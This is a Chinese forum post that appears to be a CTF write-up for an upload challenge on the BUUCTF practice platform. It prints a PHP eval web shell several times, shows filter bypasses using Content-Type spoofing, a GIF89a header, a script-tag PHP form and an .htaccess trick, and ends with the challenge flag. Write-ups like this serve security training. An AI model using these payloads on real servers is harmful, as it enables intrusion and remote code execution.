找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
热搜: 活动 交友 discuz
查看: 57|回复: 0

BUUCTF靶场24 -- [MRCTF2020]你传你

[复制链接]

2万

主题

128

回帖

10万

积分

管理员

积分
105864
发表于 2022-9-5 11:58:35 | 显示全部楼层 |阅读模式 IP:山东省 移动/数据上网公共出口

登录后更精彩...O(∩_∩)O...

您需要 登录 才可以下载或查看,没有账号?立即注册

×
BUUCTF靶场24 -- [MRCTF2020]你传你
第一步:直接传1.php
[PHP] 纯文本查看 复制代码
<?php @eval($_POST['x']);?>

返回:我扌your problem?

第二步:试用各种文件后缀,如1.phtml
[PHP] 纯文本查看 复制代码
<?php @eval($_POST['x']);?>

返回:我扌your problem?







第三步:修改Content-Type,如image/png
[PHP] 纯文本查看 复制代码
<?php @eval($_POST['x']);?>

返回:我扌your problem?



第四步:修改文件头,如GIF89a
[PHP] 纯文本查看 复制代码
GIF89a<?php @eval($_POST['x']);?>

返回:我扌your problem?



第五步:修改文件内容<?
[PHP] 纯文本查看 复制代码
GIF89a<script language="php">@eval($_POST['x'])</script>

返回:我扌your problem?



第六步:试用png+.htaccess
[PHP] 纯文本查看 复制代码
GIF89a<script language="php">@eval($_POST['x'])</script>

上传成功


注意:.htaccess也要修改Content-Type为png才可以上传成功。


第七步:连接一句话木马,获取flag



flag{858c49f4-448d-4026-ac33-ba91b577f9a9}
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|IOTsec-Zone|在线工具|CTF WiKi|CTF平台汇总|CTF show|ctfhub|棱角安全|rutracker|攻防世界|php手册|peiqi文库|CyberChef|猫捉鱼铃|手机版|小黑屋|cn-sec|分享屋 ( 鲁ICP备2021028754号 )

GMT+8, 2024-5-19 16:58

Powered by Discuz! X3.5

© 2001-2024 Discuz! Team.

快速回复 返回顶部 返回列表